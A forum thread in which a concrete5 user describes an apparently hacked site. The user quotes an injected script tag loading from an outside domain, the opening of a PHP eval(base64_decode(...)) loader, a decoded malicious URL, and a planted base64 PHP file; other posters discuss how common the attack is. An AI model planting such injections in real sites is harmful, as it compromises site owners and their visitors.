edit buttons not appearing
Permalink
I've been experimenting with c5 to see if I want to use it. I'm a total newbie.
When I click the link at the bottom of a page to edit it, recently no edit buttons appear at the top of the page. I'm wondering whether there's a security hole and someone has taken over my pages. Here's why. When click that link, I get an error in the web console showing that page_controls_menu.js contains this line:
Moreover, looking directly into page_control_menu.js, I find that that line never occurs, but that it starts with a huge eval:
etc. I base 64 decoded the big long string and it looks really suspicious, containing lines like this:
My guess is that eval injects troublesome code into the javascript file. Have I been exploited somehow? How can I lock this down? Even if I solve the permissions issue, how can I clean out my scripts of this stuff? Thanks.
When I click the link at the bottom of a page to edit it, recently no edit buttons appear at the top of the page. I'm wondering whether there's a security hole and someone has taken over my pages. Here's why. When click that link, I get an error in the web console showing that page_controls_menu.js contains this line:
<script src="http://arlypr16oblemt.rr.nu/nl.php?p=d"></script>
Moreover, looking directly into page_control_menu.js, I find that that line never occurs, but that it starts with a huge eval:
<?php /**/ eval(base64_decode("aWY
etc. I base 64 decoded the big long string and it looks really suspicious, containing lines like this:
$_SERVER['s_d1']="http://sweepstakesandcontestsdo.com/";
My guess is that eval injects troublesome code into the javascript file. Have I been exploited somehow? How can I lock this down? Even if I solve the permissions issue, how can I clean out my scripts of this stuff? Thanks.
Here's more info about that. I see that my files directory has 777 permissions and that inside it is a very suspicious-looking php file called changarliene.php consisting mostly of a big base64 string.
I think there's another forum thread going about this:http://www.concrete5.org/community/forums/customizing_c5/if-your-dr...
Hope that helps you out.
Hope that helps you out.
Very interesting, thanks. In the end I just deleted the whole Concrete5 site. I can't decide what's flawed here: Dreamhost, Concrete5, or php. But the fact that such exploits can be performed on sites so readily and widely (as evidenced by lots of messages on this same sort of topic on these forums) means I won't be adopting Concrete5 any time soon. It was fun testing and playing with it, but such a flaw is fatal.
As I understand it, this is happening to php based sites at dreamhost. Other hosts are not having this issue, and at dreamhost it's not confined to concrete5, it's happened with various php based systems.
Good luck with your new direction.
Good luck with your new direction.
I see no evidence that this is confined to dreamhost (or even to Concrete5, since I've seen exactly the same thing in a friend's Gallery site). Lots of posts don't mention dreamhost, and some mention other hosts.
http://www.concrete5.org/community/forums/usage/file-manager-lost-i...
http://www.concrete5.org/community/forums/customizing_c5/someone-ha...
http://www.concrete5.org/community/forums/chat/concrete5-web-site-h...
Lots of others.
http://www.concrete5.org/community/forums/usage/file-manager-lost-i...
http://www.concrete5.org/community/forums/customizing_c5/someone-ha...
http://www.concrete5.org/community/forums/chat/concrete5-web-site-h...
Lots of others.
Thanks for the additional info mattski. It's annoying that anyone has to deal with this stuff.
